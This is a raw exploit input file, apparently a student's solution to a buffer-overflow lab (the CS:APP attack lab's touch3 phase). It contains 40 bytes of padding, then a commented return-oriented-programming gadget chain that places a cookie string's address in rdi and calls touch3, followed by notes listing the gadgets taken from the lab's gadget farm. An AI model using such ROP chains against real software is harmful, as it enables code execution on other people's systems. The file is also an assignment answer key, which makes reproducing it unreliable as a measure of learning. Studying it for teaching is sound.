61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61

ad 1a 40 00 00 00 00 00 /* mov rsp rax */
a2 19 40 00 00 00 00 00 /* mov rax rdi */
ab 19 40 00 00 00 00 00 /* pop rax */
48 00 00 00 00 00 00 00 /* offset 9*8 = 4*16 + 8 */
dd 19 40 00 00 00 00 00 /* eax edx */
69 1a 40 00 00 00 00 00 /* edx ecx */
13 1a 40 00 00 00 00 00 /* ecx esi */
d6 19 40 00 00 00 00 00 /* lea (rdi, rsi, 1), rax */
a2 19 40 00 00 00 00 00 /* mov rax rdi */
fa 18 40 00 00 00 00 00 /* touch3 */
35 39 62 39 39 37 66 61 /* strval of cookie */
00 00 00 00 00 00 00 00


/*
mov:
rax rdi addval_273 48 89 c7
rax rdi setval_426 48 89 c7
rsp rax addval_190 48 89 e0
rsp rax setval_350 48 89 e0
eax edi setval_426 89 c7
ecx esi addval_436 89 ce
ecx esi addval_187 89 ce
eax edx addval_487 89 c2
eax edx getval_481 89 c2
edx ecx getval_311 89 d1
edx ecx getval_159 89 d1
esp eax addval_358 89 e0
esp eax setval_350 89 e0

pop:
rax addval_219 58
rax getval_280 58
rsp getval_481 5c (>> 89 c2 eax -> edx)
*/
